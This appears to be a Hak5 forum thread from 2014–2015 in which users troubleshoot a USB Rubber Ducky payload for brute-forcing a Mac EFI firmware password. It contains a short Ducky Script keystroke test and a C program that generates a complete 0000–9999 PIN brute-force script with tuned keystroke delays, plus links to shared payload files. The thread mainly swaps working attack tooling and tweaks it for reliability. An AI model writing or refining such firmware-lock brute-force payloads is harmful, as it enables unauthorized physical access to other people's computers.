emZe, posted April 22, 2014

Hi all,

I bought a Rubber Ducky recently to bypass the EFI password like the Teensy 3: https://www.youtube.com/watch?v=xXMiX-Bybsw

But when typing the password, it just types 1 or 2 dots in the password field, and after typing ENTER it sometimes does nothing...

Does anyone know the issue?

Thanks in advance. Sorry for my bad English, I'm from Belgium...

Guest spazi, posted April 22, 2014 (edited)

Hi emZe, welcome to the forums!

Can you share the payload you are using? Darren made a similar payload for brute forcing Android PINs a couple of months ago. Hak5 made a video about it on the Hak5 YouTube channel. You should look into that :) www.youtube.com/watch?feature=player_detailpage&v=yoYiEkk5TyI

How long is the Mac EFI PIN? It's typically 4 numbers, right? Do you know if there are any max attempts and if there are any time/wait penalties?

emZe (author), posted April 22, 2014

Hi,

Thanks for your help...

The payload I use is http://pastebin.com/4x53pkya

I've used many, many, many others and it's always the same... Now I'm testing a small one with a delay between all the numbers and the problem is there too:

    DELAY 5000
    STRING 1
    DELAY 1000
    STRING 1
    DELAY 1000
    STRING 1
    DELAY 1000
    STRING 1
    DELAY 5000
    ENTER
    DELAY 1000
    STRING 1
    DELAY 1000
    STRING 1
    DELAY 1000
    STRING 1
    DELAY 1000
    STRING 1
    DELAY 5000
    ENTER
    DELAY 1000
    STRING 1
    DELAY 1000
    STRING 1
    DELAY 1000
    STRING 1
    DELAY 1000
    STRING 1
    DELAY 5000
    ENTER
    DELAY 1000
    STRING 1
    DELAY 1000
    STRING 1
    DELAY 1000
    STRING 1
    DELAY 1000
    STRING 1

I think it is 4 digits, but some people say it is 6 digits now for the MBP A1286 late 2010. No penalties, no attempts.

Regards

Guest spazi, posted April 22, 2014

I noticed that the script on Pastebin sometimes has two ENTER commands. Maybe they shouldn't be there, considering that this is a Mac EFI you are trying to brute force.

I noticed that there are plenty of delays. That's always nice. Maybe you should try writing your own script, without the time penalty delays.

Not sure why it won't work, maybe it's a keyboard thing? The Rubber Ducky is cross-platform compliant, so it should work. Are you saying that the Rubber Ducky is only typing one or two numbers and then nothing happens?

emZe (author), posted April 22, 2014

I've tested with one ENTER in Notepad: no problem, all is OK, but at the EFI password prompt there is a problem.

I've tested with the Mac OS X keyboard VID/PID and it is the same...

Is the Teensy better than the Rubber Ducky??

Guest spazi, posted April 22, 2014 (edited)

> Is the Teensy better than the Rubber Ducky??

I have never tried the Teensy, so I can't say. It's probably a great tool though :) I have never had any problems with the Rubber Ducky and I've used several payloads in different scenarios. I've tested it against OS X, Linux, Windows 7, iPad iOS, iPod iOS and Android. Maybe I'm just lucky.

emZe (author), posted April 23, 2014

Maybe it's the speed of the keypress? Is it possible to change the keypress delay?

For example, for 1234:

press "1" for 500ms
release 500ms
press "2" for 500ms
release 500ms
.....
....

You know?

dataghost, posted January 5, 2015

> Maybe it's the speed of the keypress? Is it possible to change the keypress delay? For example, for 1234: press "1" for 500ms, release 500ms, press "2" for 500ms, release 500ms ... You know?

Would you know how to create this script to have the delay between the numbers? It's the issue for sure.

belly, posted February 22, 2015

Hey,

I wrote a small C program to generate a text file that I translate via the online encoder.

    #include <stdio.h>

    int main(void)
    {
        FILE *datei;
        int i;

        /* Write the Ducky Script payload to test.txt */
        datei = fopen("test.txt", "w");
        if (datei == NULL) {
            printf("Fehler beim oeffnen der Datei.");
            return 1;
        }

        /* Initial wait before the first keystroke */
        fprintf(datei, "DELAY 5000\n");

        /* 0000-0009: three leading zeros, then the digit */
        for (i = 0; i < 10; i++) {
            fprintf(datei, "STRING 0\nDELAY 700\nSTRING 0\nDELAY 700\nSTRING 0\nDELAY 700\nSTRING %i\nDELAY 700\nENTER\nDELAY 12500\n", i);
        }
        /* 0010-0099: two leading zeros */
        for (i = 10; i < 100; i++) {
            fprintf(datei, "STRING 0\nDELAY 500\nSTRING 0\nDELAY 500\nSTRING %i\nDELAY 1500\nENTER\nDELAY 7500\n", i);
        }
        /* 0100-0999: one leading zero */
        for (i = 100; i < 1000; i++) {
            fprintf(datei, "STRING 0\nDELAY 500\nSTRING %i\nDELAY 1500\nENTER\nDELAY 7500\n", i);
        }
        /* 1000-9999: no padding */
        for (i = 1000; i < 10000; i++) {
            fprintf(datei, "STRING %i\nDELAY 1500\nENTER\nDELAY 7500\n", i);
        }

        fclose(datei);
        return 0;
    }

What I realized too is that you have to put it in digit by digit; STRING 0001 ENTER is way too fast!

I keep playing around with the different delays. By now my payload is able to run for about two hours brute forcing an MBAir, but then something seems to go wrong, because it only enters three digits after running for two hours...

I also realized there are differences between a MacBook Retina and a MacBook Air.

I attached the .txt and .bin of my payload. If anyone is interested or has an idea, I would love to figure out what the problem is!

And a small video of the Ducky starting to attack^^ https://www.facebook.com/video.php?v=10204806167131861&set=vb.1168804757&type=3&theater

So long,
belly

payload (txt): http://www47.zippyshare.com/v/tXyo9I7o/file.html
payload (bin): http://www47.zippyshare.com/v/8OKsSeUy/file.html